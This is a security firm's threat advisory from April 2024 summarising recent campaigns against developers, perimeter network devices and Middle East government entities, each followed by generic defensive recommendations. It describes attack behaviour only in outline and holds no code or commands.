Threat advisories

Top Middle East Cyber Threats – April 30, 2024  

Apr-2024 5 min to read

At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats.  

In this blogpost, we share the top cybersecurity threats our MSS team has recently come across. So, read on to learn about what you need to look out for in the weeks ahead.  

New Attack Campaign Targets Software Developers

Researchers have been monitoring a new ongoing social engineering attack campaign (tracked by STR as DEV#POPPER) likely associated with threat actors who are targeting developers using fake interviews to deliver a Python-based RAT. They utilize known code repositories as part of the attack campaign.

The first stage involves downloading a zip archive from GitHub, which would have been sent to the interviewee from the interviewer. The zip file contains highly obfuscated JavaScript code that will execute further malicious files in this attack chain and gather system/network information to exfiltrate it to a remote server. This information is gathered and then transmitted in a JSON-like format back to the attacker’s C2 server by issuing a carefully crafted HTTP POST request.

The second decoded and executed string is much longer than the first and contains more functionality. Once executed, the script functions similarly to a RAT (Remote Access Trojan), allowing the attacker to interact with the victim’s machine remotely.

RECOMMENDATIONS

Ensure all systems are patched and updated.
Avoid clicking or opening untrusted or unknown links, files, or attachments.
Don’t allow Macros for unknown MSOffice files.
Enable software restriction policies and application whitelisting.
Ensure that your email server is configured to block any suspicious files.
Enforce the Restricted PowerShell script execution policy for end users.
Monitor your network for abnormal behaviours and IoCs.
Ensure frequent backups are in place.
Educate employees about detecting and reporting phishing / suspicious emails.

Google Chrome Update Fixes Multiple Vulnerabilities

Google has published a security update to address multiple vulnerabilities in Chrome browser, now fixed in the latest version (124.0.6367.78/.79 for Windows and Mac and 124.0.6367.78 for Linux).

The update includes four security fixes, three of which were contributed by external researchers. Of these three contributed fixes, one is assigned as critical, and two are rated as high-risk.

RECOMMENDATIONS

Ensure all systems are patched and updated.

New Espionage Campaign Targets Perimeter Network Devices

A state-sponsored cyber campaign named ArcaneDoor has been targeting perimeter network devices from multiple vendors, focusing on espionage. These devices, serving as critical entry points for data transmission, have been exploited to gain access to organizational networks, modify traffic, and monitor communications.

The campaign came to light in early 2024 when a vigilant customer raised concerns about their Cisco Adaptive Security Appliances (ASA). A subsequent in-depth investigation identified a previously unknown actor, now designated as UAT4356 by Cisco Talos and STORM-1849 by the Microsoft Threat Intelligence Center. This actor demonstrated sophisticated espionage capabilities and deep technical knowledge of the targeted devices.

UAT4356 implemented two backdoors, named “Line Runner” and “Line Dancer,” as part of their malicious toolkit. These backdoors were used for configuration modifications, reconnaissance, network traffic capture, data exfiltration, and potentially lateral movement within the network.

RECOMMENDATIONS

Ensure all systems are patched and updated.
Enable software restriction policies and application whitelisting.
Monitor your network for abnormal behaviours and IoCs.
Ensure frequent backups are in place.

CoralRaider Executes Infostealer Malware Distribution Through CDN

A new ongoing campaign, active since at least February 2024, has been identified, operated by a threat actor distributing three infamous infostealer malware, including Cryptbot, LummaC2, and Rhadamanthys.

This campaign uses a Content Delivery Network (CDN) cache domain as a download server, hosting the malicious HTA file and payload. 

Researchers have assessed, with moderate confidence, that the threat actor CoralRaider operates this campaign, due to multiple overlaps in tactics, techniques, and procedures (TTPs) with CoralRaider’s Rotbot campaign, including the initial attack vector of a Windows Shortcut file, intermediate PowerShell decryptor and payload download scripts, and the FoDHelper technique used to bypass User Access Controls (UAC) of the victim machine. 

RECOMMENDATIONS

Ensure all systems are patched and updated.
Avoid clicking or opening untrusted or unknown links, files or attachments.
Don’t allow Macros for unknown MSOffice files.
Enable software restriction policies and application whitelisting.
Ensure that your email server is configured to block any suspicious files.
Enforce the Restricted PowerShell script execution policy for end users.
Monitor your network for abnormal behaviours and IoCs.
Ensure frequent backups are in place.
Educate employees about detecting and reporting phishing / suspicious emails.

DuneQuixote Campaign Targets Government Entities in the Middle East

Kaspersky has identified a new malware campaign named “DuneQuixote,” targeting government entities in the Middle East. The investigation has uncovered over 30 DuneQuixote dropper samples actively used in the campaign. Two versions of droppers were revealed: regular droppers and tampered installer files posing as legitimate software such as “Total Commander.” These droppers contain malicious code designed to download an additional payload, referred to as the “CR4T” backdoor.

The initial dropper is a Windows x64 executable file or DLL file written in C/C++. Upon execution, the malware initiates a series of decoy API calls for evasion purposes. The tampered Total Commander software incorporates multiple anti-analysis measures and checks designed to prevent any connection attempts to command-and-control (C2) resources under specific conditions.

The backdoor, CR4T, is designed to grant command-line access to the attacker from the compromised host. It begins by launching a cmd.exe process and establishes two named pipes for inter-process communication. Subsequently, it sets the user agent for communication with the C2 server, using the hardcoded string “TroubleShooter” as the user agent name for requests to the C2.

RECOMMENDATIONS